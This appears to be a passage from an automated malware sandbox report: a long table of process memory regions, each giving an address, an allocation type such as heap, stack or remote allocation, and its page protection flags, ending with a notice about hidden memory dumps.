page execute and read and write
|
||
|
1E565E70000
|
heap
|
page readonly
|
||
|
2B0D000
|
heap
|
page read and write
|
||
|
2D75000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B850000
|
trusted library allocation
|
page read and write
|
||
|
214F913A000
|
heap
|
page read and write
|
||
|
7FFD9B680000
|
trusted library allocation
|
page execute and read and write
|
||
|
CE50A93000
|
stack
|
page read and write
|
||
|
1E569870000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B562000
|
trusted library allocation
|
page read and write
|
||
|
214F9129000
|
heap
|
page read and write
|
||
|
8398000
|
heap
|
page read and write
|
||
|
1FD5E000
|
stack
|
page read and write
|
||
|
74E0000
|
trusted library allocation
|
page read and write
|
||
|
3C22000
|
remote allocation
|
page execute and read and write
|
||
|
214F902B000
|
heap
|
page read and write
|
||
|
4A79000
|
trusted library allocation
|
page read and write
|
||
|
214F9056000
|
heap
|
page read and write
|
||
|
214F71B1000
|
heap
|
page read and write
|
||
|
1E565BC0000
|
heap
|
page read and write
|
||
|
1FC80000
|
heap
|
page read and write
|
||
|
5949000
|
trusted library allocation
|
page read and write
|
||
|
8080000
|
trusted library allocation
|
page read and write
|
||
|
7460000
|
trusted library allocation
|
page read and write
|
||
|
214F913A000
|
heap
|
page read and write
|
||
|
6CF0000
|
direct allocation
|
page read and write
|
||
|
1E567F55000
|
trusted library allocation
|
page read and write
|
||
|
214F9054000
|
heap
|
page read and write
|
||
|
1E57FD63000
|
heap
|
page read and write
|
||
|
B954BFF000
|
stack
|
page read and write
|
||
|
214F7500000
|
heap
|
page read and write
|
||
|
8660000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B56D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7560000
|
trusted library allocation
|
page read and write
|
||
|
200F0000
|
heap
|
page read and write
|
||
|
214F7225000
|
heap
|
page read and write
|
||
|
CE50BDF000
|
stack
|
page read and write
|
||
|
1E5779C1000
|
trusted library allocation
|
page read and write
|
||
|
6EF0000
|
heap
|
page read and write
|
||
|
B954AFE000
|
stack
|
page read and write
|
||
|
2D60000
|
trusted library allocation
|
page read and write
|
||
|
1E569698000
|
trusted library allocation
|
page read and write
|
||
|
7F60000
|
trusted library allocation
|
page read and write
|
||
|
2AD0000
|
heap
|
page read and write
|
||
|
1E577CAD000
|
trusted library allocation
|
page read and write
|
||
|
214F7210000
|
heap
|
page read and write
|
||
|
214F917E000
|
heap
|
page read and write
|
||
|
8070000
|
trusted library allocation
|
page read and write
|
||
|
745D000
|
stack
|
page read and write
|
||
|
1E567840000
|
heap
|
page read and write
|
||
|
214F716F000
|
heap
|
page read and write
|
||
|
497D000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7D0000
|
trusted library allocation
|
page read and write
|
||
|
74A0000
|
trusted library allocation
|
page read and write
|
||
|
CE513FE000
|
stack
|
page read and write
|
||
|
214F9088000
|
heap
|
page read and write
|
||
|
4A20000
|
direct allocation
|
page read and write
|
||
|
CE5204A000
|
stack
|
page read and write
|
||
|
2008B000
|
stack
|
page read and write
|
||
|
6D10000
|
direct allocation
|
page read and write
|
||
|
472B000
|
heap
|
page read and write
|
||
|
1E50012F000
|
heap
|
page read and write
|
||
|
8620000
|
direct allocation
|
page read and write
|
||
|
4A00000
|
direct allocation
|
page read and write
|
||
|
214F721A000
|
heap
|
page read and write
|
||
|
1FFC0000
|
remote allocation
|
page read and write
|
||
|
2AD9000
|
heap
|
page read and write
|
||
|
8060000
|
trusted library allocation
|
page read and write
|
||
|
72BE000
|
heap
|
page read and write
|
||
|
1E500038000
|
heap
|
page read and write
|
||
|
5921000
|
trusted library allocation
|
page read and write
|
||
|
1E565E60000
|
trusted library allocation
|
page read and write
|
||
|
1E57FD00000
|
heap
|
page read and write
|
||
|
6E50000
|
heap
|
page execute and read and write
|
||
|
1E567E46000
|
trusted library allocation
|
page read and write
|
||
|
1FE1C000
|
stack
|
page read and write
|
||
|
1E5000D4000
|
heap
|
page read and write
|
||
|
46EB000
|
heap
|
page read and write
|
||
|
4A86000
|
heap
|
page read and write
|
||
|
214F7210000
|
heap
|
page read and write
|
||
|
83E4000
|
heap
|
page read and write
|
||
|
1E500062000
|
heap
|
page read and write
|
||
|
1E56883E000
|
trusted library allocation
|
page read and write
|
||
|
473E000
|
stack
|
page read and write
|
||
|
1E565F45000
|
heap
|
page read and write
|
||
|
4670000
|
heap
|
page read and write
|
||
|
214F7233000
|
heap
|
page read and write
|
||
|
214F9030000
|
heap
|
page read and write
|
||
|
CE510F8000
|
stack
|
page read and write
|
||
|
2D70000
|
trusted library allocation
|
page read and write
|
||
|
214F717D000
|
heap
|
page read and write
|
||
|
46FE000
|
stack
|
page read and write
|
||
|
B9546FF000
|
stack
|
page read and write
|
||
|
1E567720000
|
trusted library allocation
|
page read and write
|
||
|
214F9167000
|
heap
|
page read and write
|
||
|
1E565E00000
|
heap
|
page read and write
|
||
|
2003F000
|
stack
|
page read and write
|
||
|
2D59000
|
trusted library allocation
|
page read and write
|
||
|
1E5679B0000
|
heap
|
page execute and read and write
|
||
|
4800000
|
direct allocation
|
page read and write
|
||
|
4810000
|
direct allocation
|
page read and write
|
||
|
7281000
|
heap
|
page read and write
|
||
|
1E565ED0000
|
heap
|
page read and write
|
||
|
7DF44F810000
|
trusted library allocation
|
page execute and read and write
|
||
|
CE51ECE000
|
stack
|
page read and write
|
||
|
214F9056000
|
heap
|
page read and write
|
||
|
80A0000
|
trusted library allocation
|
page read and write
|
||
|
1E569BA5000
|
trusted library allocation
|
page read and write
|
||
|
214F9020000
|
heap
|
page read and write
|
||
|
1E565C0E000
|
heap
|
page read and write
|
||
|
47CE000
|
stack
|
page read and write
|
||
|
7350000
|
heap
|
page execute and read and write
|
||
|
214F9026000
|
heap
|
page read and write
|
||
|
7FFD9B7E0000
|
trusted library allocation
|
page read and write
|
||
|
214F722D000
|
heap
|
page read and write
|
||
|
46D7000
|
heap
|
page read and write
|
||
|
6EE0000
|
heap
|
page read and write
|
||
|
1E50009B000
|
heap
|
page read and write
|
||
|
1E577CBB000
|
trusted library allocation
|
page read and write
|
||
|
214F7210000
|
heap
|
page read and write
|
||
|
83F0000
|
heap
|
page read and write
|
||
|
1E567FDA000
|
trusted library allocation
|
page read and write
|
||
|
83CE000
|
heap
|
page read and write
|
||
|
200CC000
|
stack
|
page read and write
|
||
|
4A40000
|
direct allocation
|
page read and write
|
||
|
598A000
|
trusted library allocation
|
page read and write
|
||
|
1E565C0A000
|
heap
|
page read and write
|
||
|
7FFD9B760000
|
trusted library allocation
|
page read and write
|
||
|
52B2000
|
trusted library allocation
|
page read and write
|
||
|
49F0000
|
direct allocation
|
page read and write
|
||
|
214F71D5000
|
heap
|
page read and write
|
||
|
85F0000
|
direct allocation
|
page read and write
|
||
|
214F7234000
|
heap
|
page read and write
|
||
|
214F9120000
|
heap
|
page read and write
|
||
|
8590000
|
trusted library allocation
|
page read and write
|
||
|
214F9167000
|
heap
|
page read and write
|
||
|
214F903B000
|
heap
|
page read and write
|
||
|
CE520CB000
|
stack
|
page read and write
|
||
|
7468000
|
trusted library allocation
|
page read and write
|
||
|
214F723A000
|
heap
|
page read and write
|
||
|
7FFD9B616000
|
trusted library allocation
|
page read and write
|
||
|
214F70C0000
|
heap
|
page read and write
|
||
|
1E57FE57000
|
heap
|
page execute and read and write
|
||
|
465C000
|
stack
|
page read and write
|
||
|
1E57FDBD000
|
heap
|
page read and write
|
||
|
74F0000
|
trusted library allocation
|
page read and write
|
||
|
214F9047000
|
heap
|
page read and write
|
||
|
214F721F000
|
heap
|
page read and write
|
||
|
1E5676F0000
|
trusted library allocation
|
page read and write
|
||
|
1E56976E000
|
trusted library allocation
|
page read and write
|
||
|
484E000
|
stack
|
page read and write
|
||
|
7FFD9B810000
|
trusted library allocation
|
page read and write
|
||
|
2B34000
|
heap
|
page read and write
|
||
|
741E000
|
stack
|
page read and write
|
||
|
4770000
|
heap
|
page readonly
|
||
|
2C7F000
|
stack
|
page read and write
|
||
|
CE50F7E000
|
stack
|
page read and write
|
||
|
45DE000
|
stack
|
page read and write
|
||
|
2DD8000
|
trusted library allocation
|
page read and write
|
||
|
1E569BC5000
|
trusted library allocation
|
page read and write
|
||
|
27E0000
|
heap
|
page read and write
|
||
|
CE50B9E000
|
stack
|
page read and write
|
||
|
8390000
|
heap
|
page read and write
|
||
|
2D6A000
|
trusted library allocation
|
page execute and read and write
|
||
|
214F7234000
|
heap
|
page read and write
|
||
|
1FD9E000
|
stack
|
page read and write
|
||
|
6CC0000
|
direct allocation
|
page read and write
|
||
|
7FFD9B860000
|
trusted library allocation
|
page read and write
|
||
|
74C0000
|
trusted library allocation
|
page read and write
|
||
|
4921000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B61C000
|
trusted library allocation
|
page execute and read and write
|
||
|
3A60000
|
remote allocation
|
page execute and read and write
|
||
|
7FFD9B900000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E565C50000
|
heap
|
page read and write
|
||
|
B954DFF000
|
stack
|
page read and write
|
||
|
7FFD9B8D0000
|
trusted library allocation
|
page read and write
|
||
|
8416000
|
heap
|
page read and write
|
||
|
7FFD9B560000
|
trusted library allocation
|
page read and write
|
||
|
1E567E54000
|
trusted library allocation
|
page read and write
|
||
|
7540000
|
trusted library allocation
|
page read and write
|
||
|
7271000
|
heap
|
page read and write
|
||
|
1E5679C1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7B0000
|
trusted library allocation
|
page read and write
|
||
|
1E568390000
|
trusted library allocation
|
page read and write
|
||
|
214F9147000
|
heap
|
page read and write
|
||
|
469E000
|
stack
|
page read and write
|
||
|
1E5000CC000
|
heap
|
page read and write
|
||
|
214F7218000
|
heap
|
page read and write
|
||
|
1E565BCE000
|
heap
|
page read and write
|
||
|
73DF000
|
stack
|
page read and write
|
||
|
1E567E3D000
|
trusted library allocation
|
page read and write
|
||
|
75AB000
|
stack
|
page read and write
|
||
|
7480000
|
trusted library allocation
|
page read and write
|
||
|
7314000
|
heap
|
page read and write
|
||
|
7FFD9B890000
|
trusted library allocation
|
page read and write
|
||
|
4A80000
|
heap
|
page read and write
|
||
|
2AF0000
|
trusted library section
|
page read and write
|
||
|
4A50000
|
direct allocation
|
page read and write
|
||
|
214F7231000
|
heap
|
page read and write
|
||
|
6CB0000
|
direct allocation
|
page read and write
|
||
|
7F40000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D43000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E577CCB000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8F0000
|
trusted library allocation
|
page read and write
|
||
|
214F9054000
|
heap
|
page read and write
|
||
|
739E000
|
stack
|
page read and write
|
||
|
1E567BE8000
|
trusted library allocation
|
page read and write
|
||
|
1E500145000
|
heap
|
page read and write
|
||
|
214F717A000
|
heap
|
page read and write
|
||
|
1E500024000
|
heap
|
page read and write
|
||
|
214F7505000
|
heap
|
page read and write
|
||
|
710E000
|
stack
|
page read and write
|
||
|
1E568862000
|
trusted library allocation
|
page read and write
|
||
|
214F71A1000
|
heap
|
page read and write
|
||
|
2D40000
|
trusted library allocation
|
page read and write
|
||
|
214F9044000
|
heap
|
page read and write
|
||
|
214F8BE0000
|
heap
|
page read and write
|
||
|
1E565BD7000
|
heap
|
page read and write
|
||
|
2DF0000
|
heap
|
page read and write
|
||
|
1E567845000
|
heap
|
page read and write
|
||
|
4780000
|
heap
|
page read and write
|
||
|
CE514FB000
|
stack
|
page read and write
|
||
|
1E57FE60000
|
heap
|
page read and write
|
||
|
83DC000
|
heap
|
page read and write
|
||
|
7FFD9B8C0000
|
trusted library allocation
|
page read and write
|
||
|
214F9168000
|
heap
|
page read and write
|
||
|
7FFD9B610000
|
trusted library allocation
|
page read and write
|
||
|
2CBE000
|
stack
|
page read and write
|
||
|
1E5002F0000
|
heap
|
page read and write
|
||
|
1E567F6F000
|
trusted library allocation
|
page read and write
|
||
|
1E569766000
|
trusted library allocation
|
page read and write
|
||
|
214F723E000
|
heap
|
page read and write
|
||
|
1E567A46000
|
trusted library allocation
|
page read and write
|
||
|
6CE0000
|
direct allocation
|
page read and write
|
||
|
1E567E50000
|
trusted library allocation
|
page read and write
|
||
|
1E57FE81000
|
heap
|
page read and write
|
||
|
214F9056000
|
heap
|
page read and write
|
||
|
7330000
|
heap
|
page read and write
|
||
|
214F9148000
|
heap
|
page read and write
|
||
|
74D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8B0000
|
trusted library allocation
|
page read and write
|
||
|
214F7228000
|
heap
|
page read and write
|
||
|
1FECF000
|
stack
|
page read and write
|
||
|
1E569009000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B711000
|
trusted library allocation
|
page read and write
|
||
|
85B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
214F723E000
|
heap
|
page read and write
|
||
|
214F7228000
|
heap
|
page read and write
|
||
|
2D90000
|
trusted library allocation
|
page read and write
|
||
|
255C000
|
stack
|
page read and write
|
||
|
6E55000
|
heap
|
page execute and read and write
|
||
|
7FFD9B700000
|
trusted library allocation
|
page read and write
|
||
|
1E565C06000
|
heap
|
page read and write
|
||
|
1E569BA9000
|
trusted library allocation
|
page read and write
|
||
|
200E0000
|
heap
|
page read and write
|
||
|
B9542FA000
|
stack
|
page read and write
|
||
|
1E568010000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
|
1E565C12000
|
heap
|
page read and write
|
||
|
214F721A000
|
heap
|
page read and write
|
||
|
1E565E40000
|
trusted library allocation
|
page read and write
|
||
|
7530000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B840000
|
trusted library allocation
|
page read and write
|
||
|
838C000
|
stack
|
page read and write
|
||
|
CE50B1E000
|
stack
|
page read and write
|
||
|
1E565CC0000
|
heap
|
page read and write
|
||
|
2BAE000
|
heap
|
page read and write
|
||
|
214F913A000
|
heap
|
page read and write
|
||
|
81E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7C0000
|
trusted library allocation
|
page read and write
|
||
|
49C0000
|
direct allocation
|
page read and write
|
||
|
B954CFB000
|
stack
|
page read and write
|
||
|
493F000
|
unkown
|
page read and write
|
||
|
214F9056000
|
heap
|
page read and write
|
||
|
214F7228000
|
heap
|
page read and write
|
||
|
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
|
72A6000
|
heap
|
page read and write
|
||
|
46A0000
|
trusted library allocation
|
page read and write
|
||
|
6D00000
|
direct allocation
|
page read and write
|
||
|
214F723D000
|
heap
|
page read and write
|
||
|
1FFC0000
|
remote allocation
|
page read and write
|
||
|
461F000
|
stack
|
page read and write
|
||
|
7FFD9B742000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B564000
|
trusted library allocation
|
page read and write
|
||
|
2AD5000
|
heap
|
page read and write
|
||
|
83B0000
|
heap
|
page read and write
|
||
|
1E565E80000
|
trusted library allocation
|
page read and write
|
||
|
1E567F6D000
|
trusted library allocation
|
page read and write
|
||
|
1FE8E000
|
stack
|
page read and write
|
||
|
CE51278000
|
stack
|
page read and write
|
||
|
1E565C54000
|
heap
|
page read and write
|
||
|
7FAD000
|
stack
|
page read and write
|
||
|
480E000
|
stack
|
page read and write
|
||
|
1E500028000
|
heap
|
page read and write
|
||
|
2D30000
|
trusted library allocation
|
page read and write
|
||
|
85A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B870000
|
trusted library allocation
|
page read and write
|
||
|
1E565C4E000
|
heap
|
page read and write
|
||
|
CE50FFE000
|
stack
|
page read and write
|
||
|
1E57FD65000
|
heap
|
page read and write
|
||
|
214F723E000
|
heap
|
page read and write
|
||
|
8050000
|
trusted library allocation
|
page read and write
|
||
|
4910000
|
heap
|
page read and write
|
||
|
7FFD9B750000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E500000000
|
heap
|
page execute and read and write
|
||
|
1E565DA0000
|
heap
|
page read and write
|
||
|
82FB000
|
stack
|
page read and write
|
||
|
2DB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
46EE000
|
heap
|
page read and write
|
||
|
214F7231000
|
heap
|
page read and write
|
||
|
74B0000
|
trusted library allocation
|
page read and write
|
||
|
5262000
|
trusted library allocation
|
page read and write
|
||
|
27D0000
|
heap
|
page read and write
|
||
|
2D00000
|
heap
|
page read and write
|
||
|
7FFD9B730000
|
trusted library allocation
|
page execute and read and write
|
||
|
81D5000
|
trusted library allocation
|
page read and write
|
||
|
B9547FE000
|
stack
|
page read and write
|
||
|
8030000
|
trusted library allocation
|
page read and write
|
||
|
214F9022000
|
heap
|
page read and write
|
||
|
5297000
|
trusted library allocation
|
page read and write
|
||
|
2B00000
|
heap
|
page read and write
|
||
|
2D72000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B880000
|
trusted library allocation
|
page read and write
|
||
|
1E56976A000
|
trusted library allocation
|
page read and write
|
||
|
1E57FDE6000
|
heap
|
page read and write
|
||
|
214F70E0000
|
heap
|
page read and write
|
||
|
82BC000
|
stack
|
page read and write
|
||
|
46EA000
|
heap
|
page read and write
|
||
|
214F9038000
|
heap
|
page read and write
|
||
|
214F7236000
|
heap
|
page read and write
|
||
|
1FFC0000
|
remote allocation
|
page read and write
|
||
|
214F7140000
|
heap
|
page read and write
|
||
|
214F9088000
|
heap
|
page read and write
|
||
|
7FFD9B646000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E57FDC1000
|
heap
|
page read and write
|
||
|
CE512FF000
|
stack
|
page read and write
|
||
|
2CFF000
|
stack
|
page read and write
|
||
|
1E569785000
|
trusted library allocation
|
page read and write
|
||
|
214F9166000
|
heap
|
page read and write
|
||
|
214F9021000
|
heap
|
page read and write
|
||
|
2D4D000
|
trusted library allocation
|
page execute and read and write
|
||
|
49E0000
|
direct allocation
|
page read and write
|
||
|
4A30000
|
direct allocation
|
page read and write
|
||
|
4727000
|
heap
|
page read and write
|
||
|
2D20000
|
trusted library section
|
page read and write
|
||
|
CE5137E000
|
stack
|
page read and write
|
||
|
5992000
|
trusted library allocation
|
page read and write
|
||
|
46E3000
|
heap
|
page read and write
|
||
|
214F9144000
|
heap
|
page read and write
|
||
|
1E569BC3000
|
trusted library allocation
|
page read and write
|
||
|
49D0000
|
direct allocation
|
page read and write
|
||
|
1E565C26000
|
heap
|
page read and write
|
||
|
7F37000
|
stack
|
page read and write
|
||
|
CE51FCD000
|
stack
|
page read and write
|
||
|
1FDDE000
|
stack
|
page read and write
|
||
|
7500000
|
trusted library allocation
|
page read and write
|
||
|
1E567858000
|
heap
|
page read and write
|
||
|
8425000
|
heap
|
page read and write
|
||
|
214F9128000
|
heap
|
page read and write
|
||
|
4820000
|
heap
|
page read and write
|
||
|
214F9088000
|
heap
|
page read and write
|
||
|
7F50000
|
trusted library allocation
|
page read and write
|
||
|
214F9050000
|
heap
|
page read and write
|
||
|
2DC0000
|
heap
|
page execute and read and write
|
||
|
CE50E7E000
|
stack
|
page read and write
|
||
|
214F7235000
|
heap
|
page read and write
|
||
|
1FD1F000
|
stack
|
page read and write
|
||
|
7291000
|
heap
|
page read and write
|
||
|
4825000
|
heap
|
page read and write
|
||
|
4740000
|
heap
|
page read and write
|
||
|
6AC000
|
stack
|
page read and write
|
||
|
5998000
|
trusted library allocation
|
page read and write
|
||
|
7250000
|
heap
|
page read and write
|
||
|
214F7149000
|
heap
|
page read and write
|
||
|
2C3E000
|
stack
|
page read and write
|
||
|
6CA0000
|
direct allocation
|
page read and write
|
||
|
CE51176000
|
stack
|
page read and write
|
||
|
214F9056000
|
heap
|
page read and write
|
||
|
259B000
|
stack
|
page read and write
|
||
|
CE5147E000
|
stack
|
page read and write
|
||
|
1E500101000
|
heap
|
page read and write
|
||
|
214F9056000
|
heap
|
page read and write
|
||
|
7FFD9B8E0000
|
trusted library allocation
|
page read and write
|
||
|
714E000
|
stack
|
page read and write
|
||
|
214F70B0000
|
heap
|
page read and write
|
||
|
214F7210000
|
heap
|
page read and write
|
||
|
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
|
8270000
|
heap
|
page read and write
|
||
|
52E7000
|
trusted library allocation
|
page read and write
|
||
|
CE51F4F000
|
stack
|
page read and write
|
||
|
7F3F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D50000
|
trusted library allocation
|
page read and write
|
||
|
7550000
|
trusted library allocation
|
page read and write
|
||
|
214F9028000
|
heap
|
page read and write
|
||
|
7FFD9B570000
|
trusted library allocation
|
page read and write
|
||
|
1E567F59000
|
trusted library allocation
|
page read and write
|
||
|
214F9127000
|
heap
|
page read and write
|
There are 474 hidden memdumps, click here to show them.